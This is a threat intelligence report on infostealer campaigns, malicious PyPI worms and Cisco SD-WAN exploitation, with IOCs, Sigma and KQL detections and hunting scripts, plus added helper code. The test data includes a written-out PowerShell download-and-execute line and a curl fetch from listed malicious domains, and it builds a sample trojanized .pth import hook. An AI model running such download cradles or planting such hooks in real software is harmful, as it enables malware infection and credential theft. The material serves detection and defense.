A wave of coordinated dark web activity has been detected targeting enterprise credentials through diverse vectors. Threat actors, including Storm-3075 and o1oo1, are leveraging AI hype (ChatGPT/DeepSeek) and social media platforms (TikTok) to distribute infostealers like Vidar and Lumma. Simultaneously, a sophisticated supply chain attack is targeting bioinformatics developers via malicious PyPI packages (Hades, Miasma). The objective is consistent: credential harvesting, cryptocurrency wallet theft, and establishing persistent remote access.
Threat Summary
The current threat landscape exhibits a convergence of social engineering and supply chain compromises.
- Social Engineering & Malvertising: Storm-3075 is actively impersonating AI brands to trick users into downloading loaders like Hijack Loader, which deploys Vidar and Lumma Stealer. Parallel campaigns on TikTok utilize fake software tutorials to distribute PowerShell downloaders for Vidar.
- Supply Chain Attack: A campaign targeting Python developers employs typosquatting and malicious `.abi3.so` native extensions within PyPI wheels to execute the Hades and Miasma worms upon import.
- Infrastructure Exploitation: UAT-8616 is exploiting Cisco Catalyst SD-WAN vulnerabilities (CVE-2026-20182) to drop webshells (XenShell, Godzilla) and cryptocurrency miners, facilitating lateral movement and credential dumping.
- MaaS Operations: The actor o1oo1 is marketing SilabRAT, a $5,000/month Malware-as-a-Service platform featuring HVNC (Hidden Virtual Network Computing) and browser profile cloning specifically designed to bypass MFA and steal active sessions.
Threat Actor / Malware Profile
Malware Families
- Vidar Stealer: An infostealer targeting browser data, cryptocurrency wallets, and 2FA sessions. Distributed via malvertising and fake tutorials.
- SilabRAT: A sophisticated RAT sold on dark web forums. Uses HijackLoader for execution and features HVNC for invisible remote control. Capabilities include clipboard hijacking, browser profile cloning, and session hijacking.
- Hades / Miasma: Worms targeting developers. They use malicious Python startup hooks (`.pth` files) and trojanized native extensions to achieve execution upon library import.
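An added audit helper (not code from the original report or from either campaign) that shows the two mechanisms above from a defender's side: it opens a wheel archive, flags top-level `.pth` files containing `import` lines (which `site.py` executes at every interpreter start) and lists bundled native extension modules. The wheels and the package name `bioutils` are constructed in memory for the demonstration and are hypothetical.

```python
import io
import zipfile

# Constructed sample wheels built in memory for this demonstration; the package
# name "bioutils" is hypothetical and not a package named in the report.
def build_sample_wheel(trojanized: bool) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("bioutils/__init__.py", "def run():\n    return 'ok'\n")
        zf.writestr("bioutils-1.0.dist-info/RECORD", "")
        if trojanized:
            # Native extension: its module-init code runs as soon as it is imported.
            zf.writestr("bioutils/_native.abi3.so", b"\x7fELF" + b"\x00" * 12)
            # Top-level .pth files are installed into site-packages; site.py
            # executes every line that starts with "import " at startup.
            zf.writestr("bioutils_hook.pth", "import bioutils._native\n")
    return buf.getvalue()

NATIVE_SUFFIXES = (".so", ".pyd")  # ".abi3.so" ends with ".so" and is covered

def audit_wheel(data: bytes) -> dict:
    """Collect startup hooks and native extension modules found in a wheel."""
    findings = {"pth_hooks": [], "native_exts": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".pth") and "/" not in name:
                text = zf.read(name).decode("utf-8", errors="replace")
                for line in text.splitlines():
                    if line.lstrip().startswith("import "):
                        findings["pth_hooks"].append((name, line.strip()))
            elif name.endswith(NATIVE_SUFFIXES):
                findings["native_exts"].append(name)
    return findings

def risk_level(findings: dict) -> str:
    # An import-style .pth hook that pulls in a bundled native module is the
    # combination described for Hades/Miasma; either one alone still merits review.
    if findings["pth_hooks"] and findings["native_exts"]:
        return "high"
    if findings["pth_hooks"] or findings["native_exts"]:
        return "review"
    return "low"

if __name__ == "__main__":
    for flag in (False, True):
        result = audit_wheel(build_sample_wheel(flag))
        print(f"trojanized={flag}: {risk_level(result)} {result}")
```

Run it against the `.whl` files in a pip download cache or an internal mirror to triage dependencies before the SBOM review in the response priorities.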
Adversaries
- Storm-3075: Focuses on broad social engineering campaigns using high-interest topics (AI) to deliver credential theft payloads.
- UAT-8616: Sophisticated actor targeting network infrastructure (Cisco SD-WAN) to gain administrative access and deploy webshells/miners.
- o1oo1: Developer of SilabRAT, financially motivated, catering to other criminals looking for stealthy remote access.
Attack Chain
- Initial Access: Phishing (AI branding), Malvertising (SEO poisoning), Social Media (TikTok tutorials), or Supply Chain (PyPI download).
- Execution: PowerShell commands (TikTok), Malicious DLL loading (Hijack Loader), or Native Python extension execution.
- Persistence: Scheduled tasks, Registry run keys, or Browser extension injection.
- Credential Access: Dumping browser cookies/passwords (Vidar), clipboard hijacking (SilabRAT), or scraping memory for crypto keys.
- C2 / Exfiltration: Data sent to C2 servers (e.g., `brokeapt.com`) via HTTP/HTTPS or custom protocols (GhostSocks).
IOC Analysis
The provided IOCs include:
- Domains: `brokeapt.com`, `msget.run`, `d4ug.site`. Used for C2 communication and payload delivery. SOC teams should block these at the firewall and proxy level.
- File Hashes: SHA256 and MD5 hashes for loaders, droppers, and malware payloads (Vidar, SilabRAT). These should be added to EDR blocklists and used to scan historical file archives.
- IPs: `91.199.163.124` (SilabRAT C2).
- CVEs: CVE-2026-20182, CVE-2026-20133 (Cisco SD-WAN).
Operationalization:
- EDR: Hunt for file hashes on disk and in memory.
- SIEM: Correlate firewall blocks of the listed domains with endpoint process creation events.
- Network: Use DNS query logs to identify internal systems attempting to resolve the malicious domains.
Detection Engineering
Sigma Rules
```yaml
title: Potential Vidar Stealer Distribution via PowerShell
date: 2026/06/14
description: Detects PowerShell commands often used in fake tutorials to download Vidar stealer payloads from suspicious domains.
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
author: Security Arsenal
status: experimental
tags:
  - attack.execution
  - attack.t1059.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_urls:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
      - 'brokeapt.com'
  condition: selection and selection_urls
falsepositives:
  - Legitimate administrative scripts
level: high
---
title: Malicious PyPI Package Execution via Native Extension
date: 2026/06/14
description: Detects execution of Python processes loading suspicious .abi3.so or .pyd files often associated with Hades/Miasma supply chain attacks.
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms
tags:
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
  selection_module:
    CommandLine|contains:
      - '.abi3.so'
      - '.pyd'
      - 'importlib'
  condition: selection_python and selection_module
falsepositives:
  - Legitimate bioinformatics tools
level: medium
---
title: SilabRAT or Vidar Browser Credential Access
date: 2026/06/14
description: Detects processes accessing browser user data directories, a behavior common to Vidar and SilabRAT for credential theft.
references:
  - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
  - attack.credential_access
  - attack.t1005
logsource:
  category: file_access
  product: windows
detection:
  selection:
    TargetFilename|contains:
      - '\Google\Chrome\User Data\Default\'
      - '\AppData\Local\BraveSoftware\'
      - '\AppData\Roaming\Opera Software\'
  exclusion:
    Image|endswith:
      - '\chrome.exe'
      - '\opera.exe'
      - '\brave.exe'
  condition: selection and not exclusion
falsepositives:
  - Backup software
  - Browser sync utilities
level: high
```
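An added reference implementation (not part of the original report) of the first rule's matching logic, run over constructed process_creation events so the rule can be unit-tested before deployment. It follows Sigma semantics: values in a list are OR-ed, fields within a selection are AND-ed, string modifiers are case-insensitive, and the condition is `selection and selection_urls`. The sample events are constructed and contain no real telemetry.

```python
# Detection logic of "Potential Vidar Stealer Distribution via PowerShell",
# transcribed from the Sigma rule above (added example, not page code).
RULE = {
    "selection": {
        "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
        "CommandLine|contains": ["Invoke-WebRequest", "IEX", "DownloadString"],
    },
    "selection_urls": {
        "CommandLine|contains": ["msget.run", "d4ug.site", "brokeapt.com"],
    },
}

def _field_matches(key: str, patterns: list, event: dict) -> bool:
    """One field/modifier pair; list values are OR-ed, matching is case-insensitive."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    for p in patterns:
        p = p.lower()
        if modifier == "endswith" and value.endswith(p):
            return True
        if modifier == "contains" and p in value:
            return True
        if modifier == "" and value == p:
            return True
    return False

def selection_matches(sel: dict, event: dict) -> bool:
    """All fields of a selection map must match (Sigma AND within a map)."""
    return all(_field_matches(k, v, event) for k, v in sel.items())

def rule_matches(event: dict) -> bool:
    # condition: selection and selection_urls
    return (selection_matches(RULE["selection"], event)
            and selection_matches(RULE["selection_urls"], event))

# Constructed sample events: one true positive, one internal admin download
# (download cmdlet but no IOC domain), one non-PowerShell process.
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://msget.run/x')\""},
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://intranet.example/update.ps1"},
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c curl https://d4ug.site/payload"},
]

def hunt(events: list) -> list:
    """Return indexes of events that trigger the rule."""
    return [i for i, e in enumerate(events) if rule_matches(e)]
```

The third event shows a gap worth a separate rule: a non-PowerShell downloader reaching an IOC domain is not covered here, which is what the network-level KQL hunt below is for.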
KQL (Microsoft Sentinel)
```kql
// Hunt for network connections to known malicious domains/IPs.
// KQL's "in" operator requires the list in parentheses.
let IOCs = dynamic(["brokeapt.com", "pan.rongtv.xyz", "pan.ssffaa19.xyz", "91.199.163.124", "msget.run", "d4ug.site"]);
DeviceNetworkEvents
| where RemoteUrl in~ (IOCs) or RemoteIP in (IOCs)
| project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP
| order by Timestamp desc
```
PowerShell Hunt Script
```powershell
# Hunt for file hashes associated with Vidar, SilabRAT, and Hades
$MaliciousHashes = @(
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "d94f75a70b5cabaf786ac57177ed841732e62bdcc9a29e06e5b41d9be567bcfa",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8633b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023",
    "6506d31707a39949f89534bf9705bcf889f1ecae3dbc6f4ff88d67a8be3d01b2",
    "6d332f814f15f19758d65026bbfd0a8c49671b319ec77b8fa1b27fc48afff7d9"
)
Write-Host "Scanning for malicious file hashes..." -ForegroundColor Yellow
# Search the C: drive for files matching these hashes.
# -File skips directories, which Get-FileHash cannot hash.
Get-ChildItem -Path C:\ -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
        # -in is case-insensitive, so the uppercase hex from Get-FileHash matches the lowercase list
        if ($hash -in $MaliciousHashes) {
            Write-Host "THREAT DETECTED: $($_.FullName)" -ForegroundColor Red
        }
    }
Write-Host "Scan complete."
```
Response Priorities
- **Immediate**:
  - Block all listed domains and IPs at the perimeter firewall and proxy servers.
  - Scan all endpoints for the listed file hashes.
  - Patch Cisco Catalyst SD-WAN controllers for CVE-2026-20182 and CVE-2026-20133 immediately.
- **24 Hours**:
  - Initiate credential resets for accounts with suspicious login activity or potential exposure to Vidar/SilabRAT.
  - Review browser extensions and startup items on endpoints for unauthorized additions.
  - Hunt for PowerShell execution logs matching the fake tutorial pattern.
- **1 Week**:
  - Audit all third-party Python packages and PyPI dependencies (SBOM analysis) for the identified malicious artifacts.
  - Implement application allowlisting for PowerShell to prevent arbitrary script execution.
  - Conduct security awareness training focused on "AI Impersonation" and "Social Media Scams".